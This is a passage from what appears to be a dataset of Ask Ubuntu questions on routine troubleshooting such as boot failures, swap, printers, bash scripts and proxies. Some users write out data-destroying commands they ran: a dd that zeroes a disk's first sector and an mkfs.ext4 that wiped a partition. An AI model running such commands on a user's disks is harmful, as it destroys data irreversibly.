( cdc_ether ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address > '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth1 '' # # # # # dmesg # # # # # [ 1.299759 ] e1000e : intel ( r ) pro/1000 network driver - 2.3.2-k [ 1.463135 ] e1000e 0000:00:19.0 eth0 : intel ( r ) pro/1000 network connection [ 18.312061 ] bluetooth : hci0 : intel bluetooth firmware file : intel/ibt-hw-37.7.10-fw-1.80.2.3.d.bseq [ 18.434935 ] bluetooth : hci0 : intel bluetooth firmware patch completed and activated # # # # # # # # # # wireless info end # # # # # # # # # # # #
516166	desktop sharing application port	i have installed ubuntu 14.04 lts on my desktop . i have seen the desktop sharing application which is installed with package . this application is running on port : 5900 . i need to change the port of this application to 1234 . i have been searching many blogs to get the idea to do so , but no help at all . hope to get the correct answer soon .
516168	why is my ubuntu 14.04 32 bit fresh install painfully slow on my fitpc2	i have 14.04 64 on another machine running well on another machine . i installed 14.04 32 bit on this fitpc2 mini pc with an intel 40 gig ssd drive because it has 1 gig of ram . i erased the ssd drive with hdderase prior to the fresh install , it had been running windows xp formerly . i installed ubuntu from a usb drive . i was never prompted to reformat the drive in any way after secure erasing it , nor upon installing the ubunu os . have just updated the ubuntu , that did not help . the pc has an atom 1.6 processor , though an older machine , i figured ubuntu would run very well , especially with the ssd drive . i may have made a mistake in erasing/not formatting correctly the drive ? i will try the intel firmware update for the hard drive . anybody have any clues ? a couple of errors poat at startup . but its quick and hard to read them , i 'll try and capture them .
516170	not empty cds are detected as blank !	when i insert some data cds in my cd/dvd drive , it is detected as blank . but they are not . they are detected properly in my desktop computer which uses ms windows 7 . how i could work around the problem ? os : ubuntu 14.04 system : dell inspiron n4010
516172	problem occuring while creating .exe file	i 'm trying to run test problem in the mfix but got struck with an error sh : 0 : ca n't open ../../model/make_mfix . bhaskar @ admin2-precision-t7600 : ~/mfix/run/tests/added_mass $ sh ../../model/make_mfix sh : 0 : ca n't open ../../model/make_mfix can anyone tell why it occurs and how to get rid of it .
516173	system hangs , mountall fails	i 'm really new to ubuntu , please excuse me if my question sounds stupid ( also my bad english ) . to save disk space , i had formatted my windows installation , and somehow i was able to install ubuntu once again when the first installed copy of ubuntu along with the windows start to failed . my system has 2 hard disks : 1 of 500 gb which is encrypted , other one of 160 gb . i partitioned and installed ubuntu on 160gb hdd , then i was mounting the remaining 116gb of that drive and 500 gb on /media . when i noticed my system runs without swap memory i tried editing fstab , still it does n't mount swap partition . my problem is , my system get hanged frequently , mostly when i browse using firefox/chromium . the system hangs so badly that i 'm not able to get terminal by alt+f2 , the only thing work there is alt+prtscrn+ reisub . i tried using mountall . mountall : unable to listen for privateconnections : failed to bind socket `` /com/ubuntu/mountall/server/ '' : address already in use mountall : disconnected from upstart both nginx and apache are running on my system , i have only 2gb of ram . i do n't know where to start to bring my system to working condition . ( i 'm stopping my experiments with ubuntu , whew ! ! ! ) please advise me , buying an additional ram or hdd will work here , i 'm totally confused and upset that i 'm not able to continue my works on this machine . update ( 1 ) : my system has swap memory : sudo fdisk -l device boot start end blocks id system /dev/sda1 * 63 957249089 478624513+ 83 linux device boot start end blocks id system /dev/sdb1 86085632 312580095 113247232 83 linux /dev/sdb2 61450238 86085631 12317697 f w95 ext 'd ( lba ) /dev/sdb5 78024704 81930239 1952768 82 linux swap / solaris /dev/sdb6 61450240 78010367 8280064 83 linux /dev/sdb7 81932288 86085631 2076672 82 linux swap / solaris update ( 2 ) : sudo blkid /dev/sda1 : uuid= '' 9609fc4c-ece8-4c9b-985e-c1271866aa4c '' type= '' crypto_luks '' /dev/sdb1 : label= '' ubuntu116gb-os2 '' uuid= '' 674b44fc-f619-4ca8-9d07-80a3d43d1b10 '' type= '' ext4 '' /dev/sdb6 : label= '' ubuntu8.5gb-os1 '' uuid= '' bcd535b5-eef9-4d70-be33-07153802b2ba '' type= '' ext4 '' /dev/mapper/cryptswap1 : uuid= '' 121099fc-9fa2-4051-9253-b2938c2e7468 '' type= '' swap '' sudo lsblk -o name , fstype , size , mountpoint , label name fstype size mountpoint label sda 465.8g └─sda1 crypto_luks 456.5g sdb 149.1g ├─sdb1 ext4 108g / ubuntu116gb-os2 ├─sdb2 1k ├─sdb5 1.9g ├─sdb6 ext4 7.9g ubuntu8.5gb-os1 └─sdb7 2g └─cryptswap1 ( dm-0 ) swap 2g [ swap ] cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sdb1 during installation uuid=674b44fc-f619-4ca8-9d07-80a3d43d1b10 / ext4 errors=remount-ro 0 1 # swap was on /dev/sdb7 during installation # uuid=a36435c9-e579-470a-92fc-e477afd501bc none swap sw 0 0 # /dev/mapper/cryptswap1 none swap sw 0 0 uuid=8e474f34-7b1d-49aa-81f1-607192912785 none swap sw 0 0 however , i can manually load swap by : sudo swapon /dev/mapper/cryptswap1 my system has two ubuntu installations , i 'm running every command now from os2 which is on 116gb ext4 ( please see image ) , i would like to delete the os1 on 8.5gb ext4 and make use of the two swap partition as a single one of 4gb
516174	problem with script not working properly when ran from custom launcher	i am using 13.10 and i have created a launcher that i want to place on my desktop using help from other posts that i found here . my problem is ( i think ) that my launcher does n't execute my script . when i double-click on my launchers nothing happens . this is the launcher 's code [ desktop entry ] version=0.0.1 comment=mylauncher type=application terminal=false exec=/home/user/my_prog_aug25/test-1.0.0-lin64-oem/bin/runtest.sh icon=/usr/share/icons/highcontrast/48x48/emotes/face-cool.png name=cygnuslauncher startupnotify=true and the runtest.sh script 's code is just # ! /bin/bash export ld_library_path= $ ld_library_path : $ home/my_prog_aug25/test-1.0.0-lin64-oem/tools/mylibs ; ./program running the script alone works and executes program but running the launcher does nothing . the launcher.desktop is executable , i used chmod +x launcher.desktop . any ideas or help why this is happening and how to deal with this issue .
516176	live usb boot windows 8.1	so im trying to install ubuntu to dual boot windows 8.1 on my hp pavilion . it came pre installed with windows 8.1 . before i get started here please note : i have tried with legacy mode on/off i have tried it with secure boot on/off fast boot on/off all combos of the above using lili to burn the usb using universal usb installer just booting from the iso file yelling at the computer im using a live usb to boot into the ubuntu installer and do all that stuff but every time i try booting the usb it says `` unable to boot from the selected usb device '' . what am i doing wrong and how to do it right or should i just throw away windows 8.1 all together . also : im trying to use ubuntu 14.04
516182	an audio device with an oss driver in modern ubuntu	my audio device has no driver in linux . there 's an oss driver for it , mmusbaudio . mmusbaudio provides an oss driver . it seems to work . when i cat foo.wav > /dev/sdp i get expected audio output from the card . is there a way to use this in an integrated form with pulseaudio ? i was thinking , some kind of wrapper around oss that makes it into a sink for pulseaudio ( i hope that this is correct use of the term sink ) .
516183	about partition accidently ?	i have a removable harddisk 650g , i installed my ubuntu on it just 40g , else 610g is nfts type using storage something . but yesterday i careless formatting my harddisk under windows , then i want to restart my ubuntu but it ca n't find system , then i used testdisk to recovery my harddisk under ubuntu ( there is the other computer ) , but i just can research my linux file but it apparent it was deleted . i do n't know how to recovery my ubuntu ? i think i just formatting nfts type , because windows ca n't recognize ext type , why right now i ca n't enter my linux ?
516187	problem installing canon software scangear mp	when i try to install scangearmp-common i get : e : unable to locate package scangearmp-common sudo add-apt-repository ppa : michael-gruz/canon-trunk sudo apt-get update sudo apt-get install scangearmp-common how can i fix it ?
516188	problem after installing ubuntu 14.04	the installation is completed successfully but i am not getting the gui interface . i have installed desktop version so please reply where am i having the problem in the installation , a direct command insertion is welcoming .
516191	installation of windows after installing linux problem	i have an intel x386 based desktop system ( intel p4 ) . ubuntu is already installed on it . now , i need to install windows 7 or windows 8 without effecting the linux system . please let me know what is the procedure to install windows in a machine where linux is already installed on it ?
516192	the best way to create a root filesystem , split between read only and writable	my aim is to create a system where the main parts of the root filesystem are stored on a read-only sd card , with writeable parts located on an ssd set to rw . this is to be done with a view to keeping the root filesystem free from tampering and corruption , and make updating and other maintenance a case of swapping in a pre-configured sd card . i 'm using ubuntu 14.04 lts . i 'm happy with regular partitioning and mounting to take care of /home , /var and the like , but it becomes a lot more tricky when dealing with /etc . i know some parts of /etc must be writable , such as mtab , and am also aware that /etc is accessed during boot . i have the feeling that it 's also advisable to have some parts of /etc persist between boots . i 'm leaning towards using overlayfs , only on /etc , with the upperdir only containing those files which i want to persist . anything that only needs to be read from /etc will come through from the lowerdir . the upperdir will be writable with new files , though these will only persist through boots , if identified in a whitelist . a script should run on shutdown to copy these files from the upperdir to the whitelist , and the opposite directly after boot ( or during if necessary ) . edit the whitelist aims to stop any new files written to the upperdir and persisting between boots . i 'll use permissions to manage this too . is this a good way to achieve the result i want , and what are the issues i should be aware of ? i 've read into using mount -- bind , but understand that it has issues of it 's own , i 'm also aware of the method of symlinking /etc/mtab to /proc/mounts/ and am wary of this approach too . any help would be greatly appreciated , i 've read a lot in the forums and through general web searching , details on implementing overlayfs are very scarce indeed . please feel free to let me know if i 'm greatly over-complicating things , or if there is a better approach . also this is my first question so be kind please ! ! edit i 've realised i 've made a bit of a nebulous , opinion-based type of question , so thought i might re-phrase my question . is there any other useful way setting up this kind of system , other than a union mount ?
516193	logitech c525 not working ( skype )	os : 14.04 lts ( install-upgrade from 10.04 ) skype : installed from ubuntu software center ( 4.3.0.37 ) cam : logitech c525 ( usb ) the camera does not work in a call . the funny thing is that the camera works when i enter skype settings ( the red light flashes and i can see myself in the displayed window ) . there are no other programmes installed ( ok , rhytmbox , evolution , and an old and not working openoffice from the previous 10.04 os ) . the installed versin of ubuntu is 64 bit . any suggestion ? please have in mind i am only a user and not familiar with commands ( syntax ) and troubleshooting . thank you for your time and advice !
516197	how to install virtualbox guest additions ?	how to install guest additions on ubuntu 12.04 my host is ubuntu 12.04 and my guest is kubuntu 14.04 and my virtualbox version is 4.3.14 .
516198	end script and restart it with the same options and arguments	usually ! ! repeats the last given command . but it doesnât seem to work in a bash script . is there a way to end a script and repeat it with the exact same options and arguments given the last time ? additional info : in a part of my script it is checked if a server is running . if it is n't , it is started by etherwake . this is the part , where i want the script to be ended and restarted , until the server is finally up . ignoring the problem that this easily can lead to a endless loop which might threaten system/network stability . is there an easier/safer way ? there does n't seem to be a goto line command or something similar .
516199	run bash script from another script and redirect its output	hi everyone i have to do a program.. i 'll be really concise to explain it ... and hat i 've already done and what i have to do ... simply , i have to do a `` simulator '' in bash that run exercises of students and check if they are correct ... for each exercise i have to calculate a score and say if student has passed the exam or not ... i 've done almost everything ... i think i miss just some line of code to write.. but i think they are the most important too ... : ( my script is test.sh and i must run the exercise of the student.. the exercise is a script elaborato.sh ... now , i can have some scenarios : elaborato.sh await in input as parameter some values ; elaborato.sh await in input from stdin , from keyboard ; elaborato.sh write output in a file/fifo/etc.. ; first one point it 's really simple to resolve ... infact from my test.sh i call elaborato.sh in this way : . elaborato.sh param1 param2 param3 ; second and third it 's more complex to me.. i have to read from a file a string ( and it 's ok ) and pass this string to elaborato.sh as the string was from stdin . i have to create a file with the output of elaborato.sh ... so for example , if elaborato.sh produce a file ( i donât know the name of the output file ) i have to produce a file too , in another directory ... how can i do ?
516202	could not mount iphone after restore - 14.04	i am using 14.04 and an iphone 3gs running ios 6.1.6 . all was working fine out of the box until i decided to restore my iphone to the same version of ios on a windows machine . after doing that ubuntu does n't mount my iphone and i get an error `` unable to connect '' . so far i tried reinstalling libimobiledevice4 using synaptic package manager and also tried to install libimobiledevice-utils ( sudo apt-get install libimobiledevice-utils ; idevicepair unpair & & idevicepair pair & & idevicepair validate ) unpair - gives me an error saying that device is not paired , pair and validate are working but the phone does not mount anyway . is there any other solution besides reinstalling ubuntu ?
516204	ubuntu hangs after logging back from logout	i am newbie in the linux os and i installed ubuntu 14.04 along with my window 7 os . after installation it works perfectly and i am enjoying working on it but there are some issues which is not understandable by me . the problems are : - 1 ) after log-off from my laptop , when i log-in back , my system remains in hang mode . it remains in hang mode until i restart my system ( forcefully shutting down the laptop ) . i need to know is there anything like ctrl+alt+del key in linux like in windows which i can use in future . 2 ) my system brightness setting remains in high even if i tried to lower it down it remains in high . i searched these things on web but i did n't get any answer which helps me . any new idea would be really appreciated .
516205	play on linux not intstalling games correctly	when i very first installed play on linux it mentioned that i may have a certain graphics driver that was incompatible ( by memory ) . i proceeded to install as i am brand new to ubuntu and tried to install guild wars 2 . the install worked but whenever i pressed play my entire screen locked up . i figured out how to play in window mode and it would still open a frozen window . i reinstalled after changing my graphics drivers and the same issue proceeded . then i tried to install 32bit , no luck . i changed my drivers back and followed a different method on youtube and still not luck . should i reinstall ubuntu from scratch and try again or can i some how bug check . i 've always used windows and have finally left the dark side so please bare with my inexperience : p
516206	graphics cards not dispaying videos	i have 2 graphics cards and with either installed in the agp slot they fail to display videos ( youtube etc ) . the cards are a `` ati sapphire radeon 9250 256mb 128-bit ddr agp 4x/8x '' and a `` fx5200 256 mb '' . the former is using the distributed `` radeon '' driver and the latter using the proprietary nvidia driver . which should i run with for optimum results and support within ubuntu 14.04 lts .
516207	how to remove duplicate entries in dash ?	after upgrading to ubuntu 14.04 from 12.04 i have duplicate entries in dash . how can i get rid of them ?
516208	installing ubuntu on a new ssd	hi guys i am going to install ubuntu on a new samsung 840 evo 250 gb ssd and i heard it was n't as easy as it sounds . i already know how to put a new drive in my desktop , so the only thing i need help with is installing the software on the new ssd without breaking my windows 8 installation on my first ssd : )
516209	problem with konika-minolta magicolor 4750en	i am teacher in 12k . in my classroom are 16 pc 's and 1 konika-minolta magicolor 4750en network printer . in earlier versions of ubuntu this printer works fine . but now it has no working . i can see printer from any computer on network . but when i send to it print job , then it just make some noise , but no printing . i try some other linux distributions and discover , that only in fedora it will work great . not arch , suse , all ubuntu/debian based distros how can i solve this problem ? i use original ppd files from manufacturer provided cd . i was try other ppd 's , but no luck .
516210	simple bash script not working	i 'm pretty new to bash scripting . i 'm trying to make a script to export the http_proxy variables . this is what i do from the terminal : $ export http_proxy=http : //proxy21.iitd.ernet.in:3128/ $ export https_proxy=https : //proxy21.iitd.ernet.in:3128/ this works just fine . now , here 's my script ( called setproxy ) : # ! /usr/bin/env bash if [ $ 1 -eq 22 ] then export http_proxy=http : //proxy22.iitd.ernet.in:3128/ export https_proxy=https : //proxy22.iitd.ernet.in:3128/ elif [ $ 1 -eq 21 ] then export http_proxy=http : //proxy21.iitd.ernet.in:3128/ export https_proxy=https : //proxy21.iitd.ernet.in:3128/ elif [ $ 1 -eq 61 ] then export http_proxy=http : //proxy61.iitd.ernet.in:3128/ export https_proxy=https : //proxy61.iitd.ernet.in:3128/ elif [ $ 1 -eq 62 ] then export http_proxy=http : //proxy62.iitd.ernet.in:3128/ export https_proxy=https : //proxy62.iitd.ernet.in:3128/ fi essentially , i want to set the appropriate proxy server depending on the input . i put it in the bin folder , made it executable , added bin to the path , logged in and out . the terminal accepts setproxy as a valid command ( at leat there 's no command not found error ) but , when i do : $ setproxy 22 there is no effect . the proxy remains unchanged . what am i doing wrong ?
516216	load a kernel module multiple times in 14.04 lts ?	the original modprobe command had a switch -o to rename a module when loading it into the kernel . this was useful for modules that needed to be loaded multiple times . e.g . modprobe bonding -o bond0 mode=active-backup miimon=100 primary=eth2 max_bonds=2 modprobe bonding -o bond1 mode=active-backup miimon=100 primary=eth3 max_bonds=2 in ubuntu 14.04 modprobe seems to be replaced by kmod , which does n't support the -o switch . is there a new way to load a module multiple times ?
516217	alert ! /dev/disk/by-uuid/xxxxxxxxx does not exist . dropping to a shell	i am using ubuntu 14.04 . on 23 august 2014 i ran in terminal sudo apt-get update . then i rebooted the system . and now i see : alert ! /dev/disk/by-uuid/xxxxxxxxx does not exist . dropping to a shell initramfs : _ i ca n't boot up live ubuntu from usb flash drive . yes , i double checked bios setup and the usb flash drive is ok and runs on another machine . right now i am going to buy a dvd and burn a live dvd from another laptop . sudo blkid gives me : /dev/loop0 : type= '' squashfs '' /dev/sda1 : uuid= '' xxxx '' type= '' ext4 '' /dev/sr0 : label= '' ubuntu 14.04.1 lts i386 '' type= '' iso960 '' /etc/fstab has the same uuid= '' xxxx '' and there is line where is written : errors=remount-ro 0 i have this after running boot-repair : boot-repair log . and then i still ca n't login to ubuntu . i do n't want to reinstall ubuntu , because i have a lot of data there . do you have any advice how this can be solved ?
516221	how to change the value of ~	by default ~ is given the value of /home/username/ i.e . if i use the command cd ~ it goes to the directory /home/username/ how to change the value of it to some other file such as /home/username/filename ? i do know that this can be dangerous , i am working on a ctf though , so it is fine .
516222	lost os after backup of data files to external disk	dual boot win7 and ubuntu 12.04 on a fujitsu laptop i was attempting to back up my ubuntu data files only to a wd portable hdd . my previous backup files had disappeared from a straight copy and paste form of backing up . this is pretty common from websites i have visited with all wd `` my passport '' drives . in desperation i did the same copy and paste of the current data files from my laptop to the wd `` my passport '' . well the free space on the drive disappeared and the files were transferred but it was not possible in ubuntu to see them or access them . the reason was i did not have ownership of the files on the wd hdd . ( who invented ownership of files ? : { ) re-booted into win7 and i could see and access all the files on the wd hdd . i tried to check the wd hdd with win7 disk checker . left it until morning as it was taking so long . in the morning i can see the grub selection menu of which os i want , win 7 works and ubuntu 12.04 ( default os ) does n't . recovery does n't work , nor does going back to previous ubuntu versions in the grub menu nor their recovery menu options . so , i have two problems . the first revolves around the wd hdd not allowing me to see the files i have saved and i can eventually find that for sure , somewhere in the web . the second problem however , foxes me completely as to why the os would not be visible or accessible and how to get it back ?
516223	open terminal in 'always on top ' mode on startup	i want ubuntu to open a terminal in the lower right corner when i log in , with the always on top mode enabled . i have made a script which does this when i run it from a terminal , but it does not work when i run the script by using startup applications . the window appears in the right spot , but always on top is not enabled . below is my script . # ! /bin/bash gnome-terminal -- title= '' abvtrm '' -- geometry 80x10-0 -- 255 wmctrl -a abvtrm -b add , above exit the idea is that i want to force the name of the window into being something i decide , so i have a name to refer to for wmctrl . i have noticed that if i run the command wmctrl -a abvtrm -b add , above manually in a terminal ( after logging , having the window present but not in always on top mode ) , it has no effect , which suggests to me that for some reason i am not allowed to pick a name for the window when working through startup applications . i call the script by envoking the command bash myscriptname.sh bonus question : intuition tells me that in order to have the window appear in the bottom right , i should put gnome-terminal -- title= '' abvtrm '' -- geometry 80x10-0-0 but when i do this , the window ends up somewhere in the mid-right area of my screen . why is this ?
516231	pc no longer boots after partitioning second hard disk	i have a pc with two identical disks . initially i completely ignored the second disk ( /dev/sda ) , setting up the full system on the first one ( /dev/sda ) . i got as far as a fully operational system . now i want to start using the second disk . however , if i use fdisk on /dev/sdb and i reboot , the pc is stuck . ( side information : my first boot device is `` cdrom '' , my second is `` hard drive '' . booting up i only see `` boot from cd '' , which is skipped for lack of a cd in the drive . after this : nothing . ) i can get back to a working system by starting from a livecd , and clearing the mbr of the second disk : dd if=/dev/zero of=/dev/sdb bs=512 count=1 after this , the system boots normal again . the strange thing is that even if i just do fdisk /dev/sdb and give the `` w '' command ( =write changes to disk and quit ) , so without even creating any partition , the system is not able to boot anymore . any thoughts are welcomed .
516233	canecelling the guest account ?	how can i remove the guest account from my admin account ? because there is no use of have a password for the admin account will the guest is open to anyone .
516234	why does gnome terminal open in a strange place ?	from my experience , ( html , general computer stuff ) the cordinates start in the top left as ( 0,0 ) and goes down to the bottom right depending on how big your screen is e.g . ( 800,600 ) . so why when i position gnome-terminal does it not go where i expect ? gnome-terminal -- title= '' abvtrm '' -- geometry 80x10-0-0 this should go in the top left ? but it goes centre right : why ? and how do i get it in the top corner ?
516242	how do i get a samsung scx-4729fd multifunction printer/scanner working ?	i have ubuntu 12.04 and i bought samsung scx-4729fd multifunction . printer function is working well but what about scanning i have found a default installed program called simple scan but it did n't recognize the scanner . i need configured that by command line .
516243	problems with my ubuntu 14.04 64 bits bootable usb	i 'm trying to install ubuntu 14.04 in my computer by using a bootable usb but i keep getting this error : syslinux 4.07 edd 2013-07-25 copyright ( c ) ... unkown keyword in configuration file : =j ( triangle ) no default or ui configuration directive found ! boot : _
516245	what does it mean root directory of a usb stick ?	i know that a root directory is the top directory , but a chinese machine needed to be updated , the company told me to add the files of the update to usb under the path : /udisk/ . how to add the files in ubuntu under /udisk and / is the usb root directory .
516248	migrating eclipse from juno to luna	i just upgraded my ubuntu computer from 12.04 to 14.04 , and my eclipse juno stopped working ( does n't start ) . so i decided to download eclipse luna . now i can open eclipse , but all my projects , settings and plugins are gone . is it possible to make eclipse luna look just like juno , i.e . have the same projects in package explorer , the same repositories in git repositories view and the same plugins ? ( note : copied from superuser.com http : //superuser.com/questions/800943/migrating-eclipse-from-juno-to-luna after getting no reply there )
516249	can we delay a command in ubuntu	consider any two commands . command 1 and command 2 with this script script command 1 stop two seconds after execution of first command and then execute the second command command 2 can we make make a script where a command 2 is to be performed after two seconds after the execution of command 1 . how to achieve the second step ?
516253	samsung galaxy s2 i 9100 ubuntu development	several users of great phone s2 are asking when will ubuntu be stable to flash on our devices.so im asking is there someone that will soon fix all necessery issues to make ubuntu live on our phone.we are exppecting ubuntu like money jackpot.thinking that it will be much smoother with great battery performance and optimisation.please fix everything that is necessery to make os working . greetings from serbia
516254	apache and vsftpd	simple question . var/www - > owned by user group www-data whenever i upload through ftp something on www i have to manualy run chmod 755 /var/www . or it wont show up on my browser ... i am now struggling to find how to make in ftp config so that whenever user uploads something in www folder it will have this rights ...
516256	404 error for extras.ubuntu	sudo apt-get install and sudo apt-get update show 404 error not found . so i checked the file /etc/apt/sources.list and replaced all ( xx . ) archive.ubuntu with old-releases.ubuntu . everything works fine now . however during a sudo apt-get update it shows the same error for extras.ubuntu . does anyone have a replacement for that ?
516258	how can i write a single file to a cd and use the remaining space as paranoid levels of error correction	i have a situation where i wish to have someone hold a cd for me . this cd will have a 35 page pdf on it and nothing else . as the cd might be moved about a lot and could get damaged i was thinking about writing the file to the disk over and over until the disk is full . that way no matter how madly the disk degrades over time the file should still be available . is this something ubuntu can handle ? or a method i can apply that might be effective ? the other users of the disk are likely to be mac and windows users with little or no advanced skills so it need to `` just work '' for them as normal..
516259	wireless dhcp configuration fails on open network	i upgraded to kubuntu trusty last summer , and now that i 'm back in school , i 've noticed that my laptop has been failing to connect to the school 's wireless ( which is a completely open network ) . every time i try to connect , it says connecting for a while , and then it fails with the error message : ip configuration was unavailable or , if i play with the wireless setup ( changing the driver , using direct commandline methods to connect to the network ) , then the error message changes : authorization supplicant timed out which is weird , because there 's no need to authenticate anything ( it 's an open network ) . it 's interesting , because i know that my current setup can connect to a wireless network , as it works perfectly fine at home ( which , unlike the school network , is locked down ) , and it uses dhcp there as well . i 've tried running sudo dhclient wlan0 , but nothing happens . my wireless card is a broadcom bcm4313 , and i 'm using the wl driver . any suggestions ?
516262	how can i fix these pango and fontconfig errors while trying to run promethease ?	i am trying to install the dna-analyzer promethease but i am running into a few issues . after following the advice in how can i install a .bin file ? i got the promethease executable to run but it looks like the gui is corrupted . instead of characters i only see squares . this is the corresponding output when running promethease from a terminal : nuc @ nuc : ~/downloads $ sudo ./promethease python version 2.7.3 ( default , sep 26 2013 , 20:13:52 ) [ gcc 4.6.3 ] using 64bit using frozen /tmp/_meigwdf7c temp is /tmp/tmpafajuq i am : 0 terminal_interface loaded ca n't use mwparserfromhell argv [ '/home/nuc/downloads/promethease ' ] ui is starting wizard fontconfig error : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 70 : non-double matrix element fontconfig error : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 70 : non-double matrix element fontconfig warning : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 78 : saw unknown , expected number ui logging to /home/nuc/downloads/promethease.log cwd : /home/nuc/downloads redirecting logging to /home/nuc/downloads/promethease.log ( promethease:14629 ) : pango-critical ** : no modules found : no builtin or dynamically loaded modules were found . pangofc will not work correctly . this probably means there was an error in the creation of : '/etc/pango/pango.modules' you should create this file by running : pango-querymodules > '/etc/pango/pango.modules' ( promethease:14629 ) : pango-warning ** : failed to choose a font , expect ugly output . engine-type='pangorenderfc ' , script='latin' ( promethease:14629 ) : pango-warning ** : failed to choose a font , expect ugly output . engine-type='pangorenderfc ' , script='common' cwd : /home/nuc/downloads logged to /home/nuc/downloads/promethease.log user interface completed with status=0 how can i fix these issues and get promethease to work properly ?
516263	how to copy a certain file several times with a regular ending ?	i have a single file ( a pdf ) and i want to have lots of identical copies in the same folder ( 200 would be nice ) named file-001 , file-002 etc . how do i do it ?
516264	not able to hide hidden files / folders from nautilus broswer	this is the issue in ubuntu 14.04 i am not able to hide hidden files/folders permanently from nautilus browser . i am able to hide hidden files/folders from nautilus browser temporarily but when i am restarting the machine it automatically showing the hidden files/folders in the nautilus browser .
516266	ubuntu 14.04 does not give resolution option that vista gives	i have a dual boot machine with windows vista home and ubuntu 14.04 just recently installed . it has a geforce 6100 nforce 405 internal graphics processor . in vista i can set my monitor to 1280x720 but in ubuntu 1024x768 is the highest that will work . i use an olevia olevia 23 '' 720p lcd hdtv lt23hvx for my monitor . i know it says that the 1024x768 is the highest it can do on vga but like said vista will do 1280x720 , i think even 1280x1024 ? any help would be appreciated .
516268	serious problem in ubuntu 14.04 after trying to restore a corrupt bitmap file	i prematurely used the command sudo mkfs.ext4 -s /dev/sda1 after entering a black screen after a successful boot in ubuntu 14.04 . now i can not even enter the grub2 boot screen as i get the message : missing operator system i was using windows 7 and ubuntu 14.04 in parallel before . is there any chance of recovery ?
516270	after update to 14.04 , ncurses seems to have bugs ( cursor still visible in petris )	i just upgraded to 14.04 , and wanted to kill time by playing some petris . then i noticed this : the problem also exists in other terminals . is there some option i can set to get the terminal to not show the cursor when it is n't supposed to ? ( i tried switching cursor style to i-beam , but then it constantly blinks , which is even more distracting . )
516271	trying to broadcast udp data using netcat and view packets with tcpdump with no success	to broadcast the data , i am doing : echo `` hello '' | nc 192.168.1.86 30000 i think think this should broadcast the message `` hello '' over port 30000 , and i 'm not getting an error , so that may be working fine . i am then trying to view all the packets being broadcast over port 30000 using tcpdump : sudo tcpdump -xx -i eth0 port 30000 i think this should display packet data from all packets being sent through port 30000 in hex . at the moment i broadcast data ( no error ) and set the tcpdump going , and no error . it just sits there waiting . i would be grateful for any help , thanks .
516280	why ca n't i reinstall ubuntu 12.04 lts ?	i used wubi to install ubuntu 12.04 lts on two machines . i used it for a couple of years , loved it , almost never booted into windows . an option to upgrade to 14.04 appeared so i did n't hesitate to upgrade . it failed , and now i ca n't even seem to install 12.04 , it also fails . i 've tried many options for installing that i found on the ubuntu site , they also all fail . what would cause a machine that i dual booted for years not be able to install 12.04 lts ?
516281	dist-upgrade - libreoffice dependencies later than required	when i try to update my ubuntu box , i get this error : dpkg : dependency problems prevent configuration of libreoffice-base : libreoffice-base depends on libreoffice-base-core ( = 1:4.2.4~rc2-0ubuntu1~precise3 ) ; however : version of libreoffice-base-core on system is 1:4.3.0-3ubuntu2~precise1 . libreoffice-base depends on libreoffice-base-drivers ( = 1:4.2.4~rc2-0ubuntu1~precise3 ) ; however : version of libreoffice-base-drivers on system is 1:4.3.0-3ubuntu2~precise1 . libreoffice-base depends on libreoffice-core ( = 1:4.2.4~rc2-0ubuntu1~precise3 ) ; however : version of libreoffice-core on system is 1:4.3.0-3ubuntu2~precise1 . libreoffice-core ( 1:4.3.0-3ubuntu2~precise1 ) breaks libreoffice-base ( < < 1:4.3.0-3ubuntu2~precise1 ) and is installed . version of libreoffice-base to be configured is 1:4.2.4~rc2-0ubuntu1~precise3 . libreoffice-base-drivers ( 1:4.3.0-3ubuntu2~precise1 ) breaks libreoffice-base ( < < 1:4.3.0-3ubuntu2~ ) and is installed . version of libreoffice-base to be configured is 1:4.2.4~rc2-0ubuntu1~precise3 . for a reason i do n't know , the dependencies are newer than required . i already tried install -f without success . is there any way to repair this without doing a full reinstall of libreoffice ?
516282	can not find windows 8 option after installing ubuntu	i succeded in installing ubuntu 12.04 alongside win 8 bt after that laptop directly booted to ubuntu without a grub selection menu.so i installed boot-repair which gave me grub with only ubuntu and memtest choices and not windows 8.also while installing ubuntu it asked me that something was not configured do you want to continue and i ignored and agreed.please help to get windows 8 back.also i can not see my hard drivein ubuntu .
516286	cant allocate memory when using popen running youtube-dl	i am using popen for generating the url using youtube-dl . so i used the following code snipet : //code file *fp ; char convertedurl [ 2048 ] ; memset ( convertedurl,0,2048 ) ; std : :string systemcommand ( `` /usr/local/bin/youtube-dl -g https : //www.youtube.com/watch ? v=5uls9v1nnss '' ) ; fp = popen ( systemcommand.c_str ( ) , `` r '' ) ; if ( fp == null ) { perror ( `` popen '' ) ; fprintf ( stderr , '' % d : failed opening pipe to % s\n '' , errno , systemcommand.c_str ( ) ) ; printf ( `` ***** failed to run command ******\n '' ) ; if ( pclose ( fp ) == -1 ) { printf ( `` pclose failed \n '' ) ; } exit ; } /* read the output a line at a time - output it . */ while ( fgets ( convertedurl , sizeof ( convertedurl ) , fp ) ! = null ) { printf ( `` \nconverted url is : % s \n '' , convertedurl ) ; } if ( pclose ( fp ) == -1 ) { printf ( `` pclose failed \n '' ) ; } but when i am runnign the code fp is becoming null and getting error like `` popen : cant allocate memory '' so what went wrong ? please help..
